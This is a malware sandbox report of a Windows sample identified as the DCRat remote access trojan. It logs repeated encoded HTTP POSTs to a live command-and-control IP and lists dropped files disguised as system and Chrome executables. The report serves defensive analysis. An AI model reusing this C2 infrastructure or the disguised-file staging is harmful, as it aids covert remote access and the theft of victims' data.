Dec 16, 2024 13:12:46.969079971 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 20 0c 21 14 2e 5c 25 13 2b 1e 27 3d 2a 58 27 28 30 18 2b 3d 38 5f 3e 10 24 06 2a 01 09 10 27 3c 2f 5d 3d 3e 39 57 28 01 3f 02 28 21 2a 58 02 12 26 10 2a 0c 05 57 2c 03 00 57 3d 04 26 1a 34 06 24 02 32 3e 20 0a 26 39 3d 5d 34 3a 3a 0c 3c 17 20 1e 29 3c 00 14 3d 5b 2c 03 3e 2e 21 50 08 11 26 0f 2b 02 2c 0c 2a 23 3f 1d 20 33 38 5a 33 17 3b 55 25 23 3f 0d 32 5a 3b 5f 2a 32 1a 06 2a 10 2a 1e 2c 29 26 5e 22 57 35 52 3d 38 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98 !.\%+'=X'(0+=8_>$'</]=>9W(?(!X&W,W=&4$2> &9=]4::< )<=[,>.!P&+,#? 38Z3;U%#?2Z;_2**,)&^"W5R=8.Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:44.682813883 CET	290	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 384 Expect: 100-continue
Dec 16, 2024 13:12:45.042341948 CET	384	OUT	Data Raw: 51 57 5c 53 5f 59 51 5a 58 59 51 57 59 5d 54 5f 59 5f 59 40 56 5b 5a 5c 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QW\S_YQZXYQWY]T_Y_Y@V[Z\T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!851%4_)5S6.^%(7T7X!2(?D&0),%G!"Z
Dec 16, 2024 13:12:45.918504000 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:46.156084061 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 20 0f 22 3a 00 59 31 3d 20 0c 25 3d 3d 04 24 06 0d 43 2b 03 0a 58 3d 3e 37 14 2a 59 37 58 24 59 2b 16 28 3e 36 0d 3c 06 2c 5a 2a 21 2a 58 02 12 25 02 2a 32 33 54 2c 2d 25 0a 29 2d 35 40 23 2c 33 12 25 13 28 08 26 04 22 02 37 00 2d 55 3f 39 2c 55 3e 3f 2e 1b 29 3e 28 02 3e 14 21 50 08 11 26 0e 2a 3f 2f 12 29 0d 09 59 20 1d 3c 5f 27 07 3b 1f 33 55 2b 0d 32 5a 27 5f 3e 21 38 00 2a 10 31 02 2e 07 29 07 36 1f 35 1a 29 38 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98 ":Y1= %==$C+X=>7Y7X$Y+(>6<,Z!X%23T,-%)-5@#,3%(&"7-U?9,U>?.)>(>!P&?/)Y <_';3U+2Z'_>!81.)65)8.Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:46.500910044 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:12:46.854909897 CET	1096	OUT	Data Raw: 51 53 59 50 5f 5a 54 5b 58 59 51 57 59 52 54 5c 59 5f 59 48 56 58 5a 55 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QSYP_ZT[XYQWYRT\Y_YHVXZUT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!^-29)Y!5)C4R5=%^$?=45<%+4%;+<%G!"Z*
Dec 16, 2024 13:12:47.754956961 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:47.993745089 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:48.329189062 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:12:48.682580948 CET	1096	OUT	Data Raw: 54 5e 59 56 5f 5b 51 58 58 59 51 57 59 5b 54 51 59 59 59 44 56 58 5a 58 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: T^YV_[QXXYQWY[TQYYYDVXZXT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!Z-$)%!&)^=4#="$;+)0!?-+4?%?+,%G!"Z"
Dec 16, 2024 13:12:49.563402891 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:49.798587084 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:52.150872946 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1812 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:12:52.495450974 CET	1812	OUT	Data Raw: 51 52 59 5c 5f 5f 54 5f 58 59 51 57 59 5f 54 5d 59 5b 59 41 56 5d 5a 5a 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QRY\__T_XYQWY_T]Y[YAV]ZZT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y">8%9=Z75_>& 5X%0(4769)'+$" S)%G!"Z2

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:52.968961954 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:12:53.323208094 CET	1096	OUT	Data Raw: 54 50 59 53 5f 5b 54 5a 58 59 51 57 59 58 54 5b 59 5a 59 40 56 58 5a 5c 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TPYS_[TZXYQWYXT[YZY@VXZ\T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!)8X1!^!59X>%3"&'(,,6.?'C2/><%G!"Z*.
Dec 16, 2024 13:12:54.205327988 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:54.438317060 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:58.289216995 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1812 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:12:58.635714054 CET	1812	OUT	Data Raw: 51 53 59 52 5f 5e 51 5f 58 59 51 57 59 58 54 59 59 59 59 49 56 50 5a 5d 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QSYR_^Q_XYQWYXTYYYYIVPZ]T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y![)!1) 6>%4V#.Z$;?4#Y"(<$13=<%G!"Z.
Dec 16, 2024 13:12:59.515155077 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:59.749838114 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 23 51 36 04 3e 5e 24 2d 28 0f 30 2e 32 10 30 06 24 1c 3c 3d 3f 05 3d 07 20 07 29 3c 24 00 24 11 20 07 29 58 2e 0c 3f 59 28 5b 29 1b 2a 58 02 12 26 58 3d 0c 2b 1d 2c 13 35 0f 2a 3d 2a 1a 20 2f 02 00 25 2d 3b 57 25 2a 00 07 37 07 26 0d 28 29 24 55 3e 3f 29 07 3d 03 2f 11 3f 3e 21 50 08 11 25 1a 3c 5a 33 1d 3d 20 37 5b 23 33 20 17 33 39 33 54 30 0d 3f 0a 31 02 24 00 29 1c 28 06 3e 3d 3d 05 3a 39 21 07 21 31 0b 17 2b 28 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98#Q6>^$-(0.20$<=?= )<$$ )X.?Y([)X&X=+,5=* /%-;W%*7&()$U>?)=/?>!P%<Z3= 7[#3 393T0?1$)(>==:9!!1+(.Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:58.605298042 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:12:58.963891029 CET	1096	OUT	Data Raw: 51 54 59 53 5f 58 54 5e 58 59 51 57 59 5c 54 5e 59 55 59 41 56 5f 5a 5c 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QTYS_XT^XYQWY\T^YUYAV_Z\T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!=;2$)=4%=&,S!-!0+ >$Z6%W+;&#%G!"Z>
Dec 16, 2024 13:12:59.834547997 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:00.066456079 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:00.411326885 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:13:00.766896963 CET	1096	OUT	Data Raw: 54 50 5c 53 5a 5b 54 5d 58 59 51 57 59 5b 54 5c 59 54 59 45 56 59 5a 59 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TP\SZ[T]XYQWY[T\YTYEVYZYT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y")._2= &9)(W5!$+;V$+#/%V)4$1!$W>,%G!"Z"
Dec 16, 2024 13:13:01.646538973 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:01.885570049 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:02.173295021 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:02.526333094 CET	1096	OUT	Data Raw: 51 50 59 54 5f 56 54 5a 58 59 51 57 59 5d 54 5a 59 54 59 47 56 50 5a 5f 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QPYT_VTZXYQWY]TZYTYGVPZ_T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!_)8!&-_ % S!9_$(7='?["%T+4/A&<),%G!"Z
Dec 16, 2024 13:13:03.427617073 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:03.666335106 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:03.936439991 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:04.292408943 CET	1096	OUT	Data Raw: 54 5f 59 55 5a 58 54 5e 58 59 51 57 59 5d 54 5d 59 5f 59 42 56 5d 5a 54 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: T_YUZXT^XYQWY]T]Y_YBV]ZTT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y"=^=1))_46!Y=%<5==08/>' 5<1Q<#E&0),%G!"Z*

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:04.881731987 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1812 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:05.229458094 CET	1812	OUT	Data Raw: 51 57 5c 50 5f 56 54 59 58 59 51 57 59 5f 54 58 59 55 59 42 56 5d 5a 5f 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QW\P_VTYXYQWY_TXYUYBV]Z_T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!^*X29!#S)&<S"0+ (4!/2+81;%G!"Z2
Dec 16, 2024 13:13:06.117047071 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:06.350445986 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 20 09 23 2a 00 5e 32 13 3b 1f 27 2d 22 10 24 06 09 40 3f 03 38 5e 3e 00 38 03 29 3f 2c 07 27 01 3b 16 3e 3d 25 55 3c 2f 33 00 28 31 2a 58 02 12 25 05 3d 22 0a 0b 3b 5b 2e 52 3e 04 2a 1d 23 06 3f 12 26 3d 0e 0e 24 29 21 14 23 17 29 57 2b 17 09 0c 3e 3c 0c 16 3e 3e 34 01 3d 2e 21 50 08 11 26 09 28 12 3c 08 3e 33 27 12 20 33 3b 03 27 39 23 10 25 33 3c 18 32 3f 3b 11 29 1c 3b 58 3d 2e 21 00 39 39 08 59 21 0f 3d 52 2b 38 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98 #^2;'-"$@?8^>8)?,';>=%U</3(1X%=";[.R>*#?&=$)!#)W+><>>4=.!P&(<>3' 3;'9#%3<2?;);X=.!99Y!=R+8.Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:05.046432972 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:05.401283979 CET	1096	OUT	Data Raw: 54 5f 5c 54 5f 59 54 55 58 59 51 57 59 5e 54 50 59 5c 59 44 56 5f 5a 5b 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: T_\T_YTUXYQWY^TPY\YDV_Z[T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y"*%)=Y7S9^=&+5X9Y$(B76+'@%1R),%G!"Z*6
Dec 16, 2024 13:13:06.272780895 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:06.511410952 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:06.797441006 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:13:07.151321888 CET	1096	OUT	Data Raw: 54 55 5c 50 5f 57 51 58 58 59 51 57 59 59 54 5c 59 59 59 40 56 5f 5a 5f 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TU\P_WQXXYQWYYT\YYY@V_Z_T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y![+(&)!X#%Z)57!38()4"!V('2'=%G!"Z**
Dec 16, 2024 13:13:08.033184052 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:08.266338110 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DWTukBG9R7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\MSECache\OfficeKMS\win8\6cb0b6c459d5d3

C:\Program Files (x86)\MSECache\OfficeKMS\win8\dwm.exe

C:\Program Files (x86)\MSECache\OfficeKMS\win8\dwm.exe:Zone.Identifier

C:\Program Files\Google\88d13acbc29308

C:\Program Files\Google\Chrome\Application\SetupMetrics\88d13acbc29308

C:\Program Files\Google\Chrome\Application\SetupMetrics\jXzXDduVeIqOfFYGnN.exe

C:\Program Files\Google\Chrome\Application\SetupMetrics\jXzXDduVeIqOfFYGnN.exe:Zone.Identifier

C:\Program Files\Google\jXzXDduVeIqOfFYGnN.exe

C:\Program Files\Google\jXzXDduVeIqOfFYGnN.exe:Zone.Identifier

C:\Program Files\Windows NT\TableTextService\88d13acbc29308

C:\Program Files\Windows NT\TableTextService\jXzXDduVeIqOfFYGnN.exe

Windows Analysis Report
DWTukBG9R7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:08.656513929 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1092 Expect: 100-continue Connection: Keep-Alive
